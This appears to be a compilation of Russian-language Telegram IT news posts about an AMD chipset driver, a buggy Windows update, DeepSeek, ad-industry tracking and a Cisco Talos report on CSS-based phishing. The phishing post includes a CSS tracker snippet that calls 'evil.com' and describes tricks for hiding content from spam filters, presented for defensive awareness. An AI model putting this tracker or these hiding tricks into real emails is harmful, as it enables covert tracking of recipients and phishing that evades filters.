AMD упростила замену процессоров: теперь можно обойтись без переустановки Windows 😋

AMD представила новую версию драйвера чипсета (7.02.13.148), которая делает замену процессоров Ryzen проще. Теперь пользователи могут менять ЦП без необходимости переустановки Windows 11 или 10.

Функция определения процессора теперь запускается при каждой загрузке системы. Это помогает автоматически адаптировать настройки под новый ЦП.

Проще говоря, при установке Windows запоминается конфигурация гетерогенных ядер процессора, в соответствии с которой Scheduler потом распределяет задачи. После смены всё накрывается медным тазом. Инновационный драйвер обновляет конфигурацию при каждой загрузке ⚪️

🥸 godnoTECH - Новости IT

#предложка
Разобрался со всем "наследием" прошлых админов. А может из этого слепить трон 😉

Типичный 🥸 Сисадмин

Мартовское обновление Windows 11 24H2 вызвало массовые сбои и «Синие экраны смерти» 😵

Обновление KB5053598 должно было улучшить безопасность системы, но обернулось кошмаром для пользователей.

📌 Это обновление было обязательным и включало критически важные исправления безопасности, такие как устранение уязвимости CVE-2025-24983, которая позволяла злоумышленникам повышать привилегии в системе.

Пока Microsoft не признала проблему и не выпустила исправления, пользователям рекомендуется:
• Откатить обновление.
• Отключить автоматические обновления.
• Следить за новостями.

А вы уже столкнулись с этой проблемой?

Типичный 🥸 Сисадмин

У разработчиков DeepSeek забрали паспорта 🫳

Некоторым ключевым сотрудникам DeepSeek запретили выезжать за границу, и им пришлось сдать свои паспорта.

В Китае DeepSeek получил «статус» национального достояния. Свыше 20 автобрендов и почти все производители смартфонов анонсировали или уже добавили DeepSeek в свои продукты. Даже некоторые больницы и госслужащие используют LLM в работе.

Типичный 🥸 Сисадмин

😐 «Мы знаем всё о вас»: рекламная корпорация похвасталась тотальной слежкой за пользователями

Французская Publicis Groupe выпустила видео, которое заставило экспертов по кибербезопасности схватиться за голову. Алгоритм CoreAI анализирует поведение 91% взрослых интернет-пользователей, предсказывая их действия и влияя на выбор.

❓ Как это работает?

— В видео Publicis представила модельного пользователя Лолу, которая олицетворяет среднестатистического потребителя.

— Компания знает о ней буквально все: что она читает, смотрит, где живет, с кем общается, что и где покупает, а главное — почему она это делает 🛍

— CoreAI анализирует даже такие детали, как инфляция и изменения цен на товары, предсказывая, что Лола, например, переключится на более дешевый бренд сока для своих детей.

— Как только алгоритм делает такой вывод, Publicis тут же начинает показывать ей рекламу именно этих более дешевых товаров.

❗️ Эксперты обеспокоены: индустрия брокеров данных остается нерегулируемой, непрозрачной и опасной. Компании вроде Publicis собирают огромные массивы информации о пользователях, продают их третьим лицам, а конечная судьба этих данных остается неизвестной.

😱 — Это уже перебор!
😴 — Пусть смотрят, мне скрывать нечего.
😁 — Реклама дешёвого сока? Да это же гениально!

🥸 godnoTECH - Новости IT

Неправильно.
Это кнопка № 0

Типичный 🎹 Сисадмин

#предложка
Мы как-то iRu взяли. Я первые несколько секунд был озадачен.

Типичный 🤔 Сисадмин

Новый фишинг: Использование CSS для обхода спам-фильтров и слежки за пользователями.

Специалисты Cisco Talos опубликовали данные о новой технике, которую хакеры применяют для доставки фишинговых писем и слежки за жертвами. В отличие от традиционных методов с использованием JavaScript, здесь задействуется CSS, что усложняет обнаружение современными почтовыми фильтрами.

Как это работает, в двух словах:

Злоумышленники встраивают в HTML-письмо хитрый CSS-код, который:

🟢Прячет фишинговый контент: Используют CSS-свойства вроде text-indent: -9999px, opacity: 0 и другие, чтобы скрыть вредоносные элементы от глаз пользователей и простых спам-фильтров, которые смотрят на видимый текст.
🟢Организует слежку: Через @media-запросы (например, @media (max-width: 600px)) отслеживают взаимодействие с письмом – изменение размера окна, клики и т.п. – и отправляют данные на сервер злоумышленников.
🟢Обходит детекцию: Без JavaScript письмо выглядит менее подозрительно для систем, которые заточены на ловлю скриптов или вредных вложений.

Вот пример кода для наглядности:

<style>
  .tracker { display: none; }
  @media (max-width: 600px) {
    .tracker { display: block; background: url('http://evil.com/track?user=1'); }
  }
</style>
<div class="tracker"></div>

Принцип работы трекера:

Изменение размера окна просмотра письма (например, открытие на телефоне) может активировать скрытые элементы CSS. Эти элементы, в свою очередь, инициируют запросы к внешним ресурсам, расположенным на сервере злоумышленников, тем самым отслеживая активность пользователя.

Технические нюансы:

🟢JavaScript free: Вся схема работает только на HTML и CSS, что делает ее устойчивой к блокировщикам скриптов.
🟢Слабое место фильтров: Большинство спам-фильтров пока не умеют глубоко анализировать CSS на предмет таких штук, а сигнатуры еще не обновились.
🟢Вариативность сокрытия: Кроме text-indent и opacity, могут использовать position: absolute с отрицательными координатами или font-size: 0 для маскировки текста. Главное – скрыть видимое, но сохранить работоспособность трекера при рендеринге.

Что делать сисадминам, чтобы не пропустить новый фишинг:

🟢Прокачать фильтры: Настроить почтовые шлюзы на более глубокий анализ CSS в HTML-письмах. Для SpamAssassin, например, можно добавить правила для отлова подозрительных @media-запросов.
🟢Мониторить исходящий трафик: Следить за запросами к подозрительным доменам из почтовых клиентов, особенно если видите запросы на загрузку фоновых изображений (background: url()).
🟢Просвещать пользователей.

Пока это не массовая история, но метод реально обходит стандартные защиты и может стать трендом. Возможен рост таких атак, особенно в корпоративной среде.

Пора пересесть на lynx и читать почту в терминале 😬

Типичный 🥸 Сисадмин